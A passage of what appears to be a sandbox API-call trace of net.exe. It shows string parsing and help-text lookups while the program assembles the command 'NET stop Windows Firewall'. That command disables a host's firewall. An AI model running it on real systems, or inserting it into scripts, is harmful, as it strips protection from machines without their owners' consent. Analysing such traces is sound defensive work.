SESS", _Delimiter=":,$", _Context=0x1eb | out: _String="\r\nSESSION", _Context=0x1eb) returned="\r\nSESSION" [0295.967] wcsspn (_String="\r\nSESSION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0295.967] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x477ba50 | out: _String=0x0, _Context=0x477ba50) returned=" SESSIONS" [0295.967] wcsspn (_String=" SESSIONS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0295.967] _wcsicmp (_String1="SESSIONS", _String2="stop") returned -15 [0295.967] _wcsicmp (_String1="SESSIONS", _String2="Windows") returned -4 [0295.967] _wcsicmp (_String1="SESSIONS", _String2="Firewall") returned 13 [0295.967] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned=" SESS" [0295.967] wcsspn (_String=" SESS", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0295.968] _wcsicmp (_String1="SESS", _String2="stop") returned -15 [0295.968] _wcsicmp (_String1="SESS", _String2="Windows") returned -4 [0295.968] _wcsicmp (_String1="SESS", _String2="Firewall") returned 13 [0295.968] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned 0x0 [0295.968] wcstok (in: _String="\r\nSTATISTICS: STATS", _Delimiter=":,$", _Context=0x1eb | out: _String="\r\nSTATISTICS", _Context=0x1eb) returned="\r\nSTATISTICS" [0295.968] wcsspn (_String="\r\nSTATISTICS", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0295.968] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x477ba8c | out: _String=0x0, _Context=0x477ba8c) returned=" STATS" [0295.968] wcsspn (_String=" STATS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0295.968] _wcsicmp (_String1="STATS", _String2="stop") returned -14 [0295.968] _wcsicmp (_String1="STATS", _String2="Windows") returned -4 [0295.968] _wcsicmp (_String1="STATS", _String2="Firewall") returned 13 [0295.968] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned 0x0 [0295.968] wcstok (in: _String="\r\nUSER: USERS", _Delimiter=":,$", _Context=0x1eb | out: _String="\r\nUSER", _Context=0x1eb) returned="\r\nUSER" [0295.968] wcsspn (_String="\r\nUSER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0295.968] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x477babc | out: _String=0x0, _Context=0x477babc) returned=" USERS" [0295.968] wcsspn (_String=" USERS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0295.968] _wcsicmp (_String1="USERS", _String2="stop") returned 2 [0295.969] _wcsicmp (_String1="USERS", _String2="Windows") returned -2 [0295.969] _wcsicmp (_String1="USERS", _String2="Firewall") returned 15 [0295.969] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned 0x0 [0295.969] wcstok (in: _String="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR", _Delimiter=":,$", _Context=0x1eb | out: _String="\r\nWORKSTATION", _Context=0x1eb) returned="\r\nWORKSTATION" [0295.969] wcsspn (_String="\r\nWORKSTATION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0295.969] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x477bae0 | out: _String=0x0, _Context=0x477bae0) returned=" REDIRECTOR" [0295.969] wcsspn (_String=" REDIRECTOR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0295.969] _wcsicmp (_String1="REDIRECTOR", _String2="stop") returned -1 [0295.969] _wcsicmp (_String1="REDIRECTOR", _String2="Windows") returned -5 [0295.969] _wcsicmp (_String1="REDIRECTOR", _String2="Firewall") returned 12 [0295.969] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned=" REDIR" [0295.969] wcsspn (_String=" REDIR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0295.969] _wcsicmp (_String1="REDIR", _String2="stop") returned -1 [0295.969] _wcsicmp (_String1="REDIR", _String2="Windows") returned -5 [0295.969] _wcsicmp (_String1="REDIR", _String2="Firewall") returned 12 [0295.969] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned=" RDR" [0295.969] wcsspn (_String=" RDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0295.969] _wcsicmp (_String1="RDR", _String2="stop") returned -1 [0295.969] _wcsicmp (_String1="RDR", _String2="Windows") returned -5 [0295.969] _wcsicmp (_String1="RDR", _String2="Firewall") returned 12 [0295.969] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned=" WORK" [0295.970] wcsspn (_String=" WORK", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0295.970] _wcsicmp (_String1="WORK", _String2="stop") returned 4 [0295.970] _wcsicmp (_String1="WORK", _String2="Windows") returned 6 [0295.970] _wcsicmp (_String1="WORK", _String2="Firewall") returned 17 [0295.970] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned=" WKSTA" [0295.970] wcsspn (_String=" WKSTA", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0295.970] _wcsicmp (_String1="WKSTA", _String2="stop") returned 4 [0295.970] _wcsicmp (_String1="WKSTA", _String2="Windows") returned 2 [0295.970] _wcsicmp (_String1="WKSTA", _String2="Firewall") returned 17 [0295.970] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned=" PRDR" [0295.970] wcsspn (_String=" PRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0295.970] _wcsicmp (_String1="PRDR", _String2="stop") returned -3 [0295.970] _wcsicmp (_String1="PRDR", _String2="Windows") returned -7 [0295.970] _wcsicmp (_String1="PRDR", _String2="Firewall") returned 10 [0295.970] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned=" DEVRDR" [0295.970] wcsspn (_String=" DEVRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0295.970] _wcsicmp (_String1="DEVRDR", _String2="stop") returned -15 [0295.970] _wcsicmp (_String1="DEVRDR", _String2="Windows") returned -19 [0295.970] _wcsicmp (_String1="DEVRDR", _String2="Firewall") returned -2 [0295.970] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned 0x0 [0295.971] wcstok (in: _String="\r\nSERVER: SVR, SRV", _Delimiter=":,$", _Context=0x1eb | out: _String="\r\nSERVER", _Context=0x1eb) returned="\r\nSERVER" [0295.971] wcsspn (_String="\r\nSERVER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0295.971] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x477bb6a | out: _String=0x0, _Context=0x477bb6a) returned=" SVR" [0295.971] wcsspn (_String=" SVR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0295.971] _wcsicmp (_String1="SVR", _String2="stop") returned 2 [0295.971] _wcsicmp (_String1="SVR", _String2="Windows") returned -4 [0295.971] _wcsicmp (_String1="SVR", _String2="Firewall") returned 13 [0295.971] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned=" SRV" [0295.971] wcsspn (_String=" SRV", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0295.971] _wcsicmp (_String1="SRV", _String2="stop") returned -2 [0295.971] _wcsicmp (_String1="SRV", _String2="Windows") returned -4 [0295.971] _wcsicmp (_String1="SRV", _String2="Firewall") returned 13 [0295.971] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned 0x0 [0295.971] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc5e, dwLanguageId=0x0, lpBuffer=0x11f7a8, nSize=0x0, Arguments=0x11f7a4 | out: lpBuffer="燀ѷﰰ\x11老 ౞") returned 0x1c [0295.971] wcstok (in: _String="NAMES$\r\nSYNTAX$\r\nSERVICES$\r\n", _Delimiter="$", _Context=0x1eb | out: _String="NAMES", _Context=0x1eb) returned="NAMES" [0295.971] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned="\r\nSYNTAX" [0295.971] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned="\r\nSERVICES" [0295.972] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned="\r\n" [0295.972] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned 0x0 [0295.972] wcsspn (_String="NAMES", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0295.972] _wcsicmp (_String1="stop", _String2="NAMES") returned 5 [0295.972] wcsspn (_String="\r\nSYNTAX", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0295.972] _wcsicmp (_String1="stop", _String2="SYNTAX") returned -5 [0295.972] wcsspn (_String="\r\nSERVICES", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0295.972] _wcsicmp (_String1="stop", _String2="SERVICES") returned 15 [0295.972] wcscpy_s (in: _Destination=0x217698, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0295.972] LoadLibraryExW (lpLibFileName="NETMSG", hFile=0x0, dwFlags=0x20) returned 0x4610002 [0295.981] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x4610002, dwMessageId=0x111d, dwLanguageId=0x0, lpBuffer=0x217ca8, nSize=0x800, Arguments=0x217450 | out: lpBuffer="The syntax of this command is:\r\n") returned 0x20 [0295.983] GetFileType (hFile=0x40) returned 0x2 [0295.983] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x11f770 | out: lpMode=0x11f770) returned 1 [0295.984] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x217ca8*, nNumberOfCharsToWrite=0x20, lpNumberOfCharsWritten=0x11f77c, lpReserved=0x0 | out: lpBuffer=0x217ca8*, lpNumberOfCharsWritten=0x11f77c*=0x20) returned 1 [0295.988] GetFileType (hFile=0x40) returned 0x2 [0295.988] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x11f770 | out: lpMode=0x11f770) returned 1 [0295.989] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x1f1250*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x11f77c, lpReserved=0x0 | out: lpBuffer=0x1f1250*, lpNumberOfCharsWritten=0x11f77c*=0x2) returned 1 [0295.989] wcscpy_s (in: _Destination=0x11f818, _SizeInWords=0x200, _Source="NET" | out: _Destination="NET") returned 0x0 [0295.989] wcsncat_s (in: _Destination="NET", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET ") returned 0x0 [0295.989] wcsncat_s (in: _Destination="NET ", _SizeInWords=0x200, _Source="stop", _MaxCount=0xffffffff | out: _Destination="NET stop") returned 0x0 [0295.989] wcsncat_s (in: _Destination="NET stop", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ") returned 0x0 [0295.990] wcsncat_s (in: _Destination="NET stop ", _SizeInWords=0x200, _Source="Windows", _MaxCount=0xffffffff | out: _Destination="NET stop Windows") returned 0x0 [0295.990] wcsncat_s (in: _Destination="NET stop Windows", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop Windows ") returned 0x0 [0295.990] wcsncat_s (in: _Destination="NET stop Windows ", _SizeInWords=0x200, _Source="Firewall", _MaxCount=0xffffffff | out: _Destination="NET stop Windows Firewall") returned 0x0 [0295.990] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="쎰ѷ\x11筴 ௼") returned 0xad [0295.990] _wcsnicmp (_String1="NET stop Windows Firewall", _String2="NET ACCOUNTS\r\n[/FORCELOGO", _MaxCount=0x19) returned 18 [0295.990] LocalFree (hMem=0x477c3b0) returned 0x0 [0295.990] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="쎰ѷ\x11筴 ௿") returned 0x2e [0295.990] _wcsnicmp (_String1="NET stop Windows Firewall", _String2="NET COMPUTER\r\n\\\\computern", _MaxCount=0x19) returned 16 [0295.990] LocalFree (hMem=0x477c3b0) returned 0x0 [0295.990] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="쎰ѷ\x11筴 ం") returned 0x7d [0295.990] _wcsnicmp (_String1="NET stop Windows Firewall", _String2="NET CONFIG SERVER\r\n[/AUTO", _MaxCount=0x19) returned 16 [0295.990] LocalFree (hMem=0x477c3b0) returned 0x0 [0295.990] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="쎰ѷ\x11筴 అ") returned 0x26 [0295.990] _wcsnicmp (_String1="NET stop Windows Firewall", _String2="NET CONFIG\r\n[SERVER | WOR", _MaxCount=0x19) returned 16 [0295.990] LocalFree (hMem=0x477c3b0) returned 0x0 [0295.990] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="箰ѷ\x11筴 ఈ") returned 0x19 [0295.990] _wcsnicmp (_String1="NET stop Windows Firewall", _String2="NET CONTINUE\r\nservice\r\n\r\n", _MaxCount=0x19) returned 16 [0295.990] LocalFree (hMem=0x4777bb0) returned 0x0 [0295.991] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="箰ѷ\x11筴 ఋ") returned 0x1b [0295.991] _wcsnicmp (_String1="NET stop Windows Firewall", _String2="NET FILE\r\n[id [/CLOSE]]\r\n", _MaxCount=0x19) returned 13 [0295.991] LocalFree (hMem=0x4777bb0) returned 0x0 [0295.991] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="쎰ѷ\x11筴 ఎ") returned 0xbe [0295.991] _wcsnicmp (_String1="NET stop Windows Firewall", _String2="NET GROUP\r\n[groupname [/C", _MaxCount=0x19) returned 12 [0295.991] LocalFree (hMem=0x477c3b0) returned 0x0 [0295.991] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="쎰ѷ\x11筴 ఑") returned 0x33 [0295.991] _wcsnicmp (_String1="NET stop Windows Firewall", _String2="NET HELP\r\ncommand\r\n -", _MaxCount=0x19) returned 11 [0295.991] LocalFree (hMem=0x477c3b0) returned 0x0 [0295.991] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="箰ѷ\x11筴 ఔ") returned 0x19 [0295.991] _wcsnicmp (_String1="NET stop Windows Firewall", _String2="NET HELPMSG\r\nmessage#\r\n\r\n", _MaxCount=0x19) returned 11 [0295.991] LocalFree (hMem=0x4777bb0) returned 0x0 [0295.991] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="쎰ѷ\x11筴 గ") returned 0xc1 [0295.991] _wcsnicmp (_String1="NET stop Windows Firewall", _String2="NET LOCALGROUP\r\n[groupnam", _MaxCount=0x19) returned 7 [0295.991] LocalFree (hMem=0x477c3b0) returned 0x0 [0295.991] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="箰ѷ\x11筴 చ") returned 0x16 [0295.991] _wcsnicmp (_String1="NET stop Windows Firewall", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x19) returned 3 [0295.991] LocalFree (hMem=0x4777bb0) returned 0x0 [0295.991] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="쎰ѷ\x11筴 ఝ") returned 0x33 [0295.992] _wcsnicmp (_String1="NET stop Windows Firewall", _String2="NET SESSION\r\n[\\\\computern", _MaxCount=0x19) returned 15 [0295.992] LocalFree (hMem=0x477c3b0) returned 0x0 [0295.992] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="쎰ѷ\x11筴 ఠ") returned 0x234 [0295.992] _wcsnicmp (_String1="NET stop Windows Firewall", _String2="NET SHARE\r\nsharename\r\n ", _MaxCount=0x19) returned 12 [0295.992] LocalFree (hMem=0x477c3b0) returned 0x0 [0295.992] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="氈ѷ\x11筴 ణ") returned 0x13 [0295.992] _wcsnicmp (_String1="NET stop Windows Firewall", _String2="NET START BROWSER\r\n", _MaxCount=0x19) returned 14 [0295.992] LocalFree (hMem=0x4776c08) returned 0x0 [0295.993] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="爈ѷ\x11筴 ద") returned 0x14 [0295.993] _wcsnicmp (_String1="NET stop Windows Firewall", _String2="NET START EVENTLOG\r\n", _MaxCount=0x19) returned 14 [0295.993] LocalFree (hMem=0x4777208) returned 0x0 [0295.993] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="爈ѷ\x11筴 ఩") returned 0x14 [0295.993] _wcsnicmp (_String1="NET stop Windows Firewall", _String2="NET START NETLOGON\r\n", _MaxCount=0x19) returned 14 [0295.993] LocalFree (hMem=0x4777208) returned 0x0 [0295.993] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="㍠ѷ\x11筴 బ") returned 0x11 [0295.993] _wcsnicmp (_String1="NET stop Windows Firewall", _String2="NET START RPCSS\r\n", _MaxCount=0x19) returned 14 [0295.993] LocalFree (hMem=0x4773360) returned 0x0 [0295.993] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="爈ѷ\x11筴 య") returned 0x14 [0295.993] _wcsnicmp (_String1="NET stop Windows Firewall", _String2="NET START SCHEDULE\r\n", _MaxCount=0x19) returned 14 [0295.993] LocalFree (hMem=0x4777208) returned 0x0 [0295.993] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="濸ѷ\x11筴 ల") returned 0x12 [0295.993] _wcsnicmp (_String1="NET stop Windows Firewall", _String2="NET START SERVER\r\n", _MaxCount=0x19) returned 14 [0295.993] LocalFree (hMem=0x4776ff8) returned 0x0 [0295.993] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="㍠ѷ\x11筴 వ") returned 0xf [0295.993] _wcsnicmp (_String1="NET stop Windows Firewall", _String2="NET START UPS\r\n", _MaxCount=0x19) returned 14 [0295.994] LocalFree (hMem=0x4773360) returned 0x0 [0295.994] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="箰ѷ\x11筴 స") returned 0x17 [0295.994] _wcsnicmp (_String1="NET stop Windows Firewall", _String2="NET START WORKSTATION\r\n", _MaxCount=0x19) returned 14 [0295.994] LocalFree (hMem=0x4777bb0) returned 0x0 [0295.994] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="箰ѷ\x11筴 ఻") returned 0x18 [0295.994] _wcsnicmp (_String1="NET stop Windows Firewall", _String2="NET START\r\n[service]\r\n\r\n", _MaxCount=0x19) returned 14 [0295.994] LocalFree (hMem=0x4777bb0) returned 0x0 [0295.994] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="쎰ѷ\x11筴 ా") returned 0x2a [0295.994] _wcsnicmp (_String1="NET stop Windows Firewall", _String2="NET STATISTICS\r\n[WORKSTAT", _MaxCount=0x19) returned 14 [0295.994] LocalFree (hMem=0x477c3b0) returned 0x0 [0295.994] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="箰ѷ\x11筴 ు") returned 0x15 [0295.994] _wcsnicmp (_String1="NET stop Windows Firewall", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x19) returned 19 [0295.994] LocalFree (hMem=0x4777bb0) returned 0x0 [0295.994] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="쎰ѷ\x11筴 ౄ") returned 0x58 [0295.994] _wcsnicmp (_String1="NET stop Windows Firewall", _String2="NET TIME\r\n\r\n[\\\\computerna", _MaxCount=0x19) returned -1 [0295.994] LocalFree (hMem=0x477c3b0) returned 0x0 [0295.994] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="쎰ѷ\x11筴 ే") returned 0x184 [0295.994] _wcsnicmp (_String1="NET stop Windows Firewall", _String2="NET USE\r\n[devicename | *]", _MaxCount=0x19) returned -2 [0295.994] LocalFree (hMem=0x477c3b0) returned 0x0 [0295.994] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="쎰ѷ\x11筴 ొ") returned 0xf0 [0295.994] _wcsnicmp (_String1="NET stop Windows Firewall", _String2="NET USER\r\n[username [pass", _MaxCount=0x19) returned -2 [0295.994] LocalFree (hMem=0x477c3b0) returned 0x0 [0295.994] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="쎰ѷ\x11筴 ్") returned 0x47 [0295.995] _wcsnicmp (_String1="NET stop Windows Firewall", _String2="NET VIEW\r\n[\\\\computername", _MaxCount=0x19) returned -3 [0295.995] LocalFree (hMem=0x477c3b0) returned 0x0 [0295.995] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="쎰ѷ\x11筴 ౐") returned 0xc2 [0295.995] _wcsnicmp (_String1="NET stop Windows Firewall", _String2="NET\r\n [ ACCOUNTS | COM", _MaxCount=0x19) returned 19 [0295.995] LocalFree (hMem=0x477c3b0) returned 0x0 [0295.995] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="쎰ѷ\x11筴 ౓") returned 0x28d [0295.995] _wcsnicmp (_String1="NET stop Windows Firewall", _String2="SERVICES\r\nNET START can b", _MaxCount=0x19) returned -5 [0295.995] LocalFree (hMem=0x477c3b0) returned 0x0 [0295.995] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="쎰ѷ\x11筴 ౖ") returned 0x483 [0295.995] _wcsnicmp (_String1="NET stop Windows Firewall", _String2="SYNTAX\r\nThe following con", _MaxCount=0x19) returned -5 [0295.995] LocalFree (hMem=0x477c3b0) returned 0x0 [0295.995] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="쎰ѷ\x11筴 ౙ") returned 0xa86 [0295.996] _wcsnicmp (_String1="NET stop Windows Firewall", _String2="NAMES\r\nThe following type", _MaxCount=0x19) returned 4 [0295.996] LocalFree (hMem=0x477c3b0) returned 0x0 [0295.996] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="쎰ѷ\x11筴 ౜") returned 0x54 [0295.996] _wcsnicmp (_String1="NET stop Windows Firewall", _String2="\r\nFor more information on", _MaxCount=0x19) returned 97 [0295.996] LocalFree (hMem=0x477c3b0) returned 0x0 [0295.996] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="쎰ѷ\x11筴 ௼") returned 0xad [0295.996] _wcsnicmp (_String1="NET stop Windows", _String2="NET ACCOUNTS\r\n[/", _MaxCount=0x10) returned 18 [0295.996] LocalFree (hMem=0x477c3b0) returned 0x0 [0295.996] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="쎰ѷ\x11筴 ௿") returned 0x2e [0295.996] _wcsnicmp (_String1="NET stop Windows", _String2="NET COMPUTER\r\n\\\\", _MaxCount=0x10) returned 16 [0295.996] LocalFree (hMem=0x477c3b0) returned 0x0 [0295.996] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="쎰ѷ\x11筴 ం") returned 0x7d [0295.996] _wcsnicmp (_String1="NET stop Windows", _String2="NET CONFIG SERVE", _MaxCount=0x10) returned 16 [0295.996] LocalFree (hMem=0x477c3b0) returned 0x0 [0295.996] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="쎰ѷ\x11筴 అ") returned 0x26 [0295.996] _wcsnicmp (_String1="NET stop Windows", _String2="NET CONFIG\r\n[SER", _MaxCount=0x10) returned 16 [0295.996] LocalFree (hMem=0x477c3b0) returned 0x0 [0295.996] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="箰ѷ\x11筴 ఈ") returned 0x19 [0295.996] _wcsnicmp (_String1="NET stop Windows", _String2="NET CONTINUE\r\nse", _MaxCount=0x10) returned 16 [0295.996] LocalFree (hMem=0x4777bb0) returned 0x0 [0295.997] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="箰ѷ\x11筴 ఋ") returned 0x1b [0295.997] _wcsnicmp (_String1="NET stop Windows", _String2="NET FILE\r\n[id [/", _MaxCount=0x10) returned 13 [0295.997] LocalFree (hMem=0x4777bb0) returned 0x0 [0295.997] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="쎰ѷ\x11筴 ఎ") 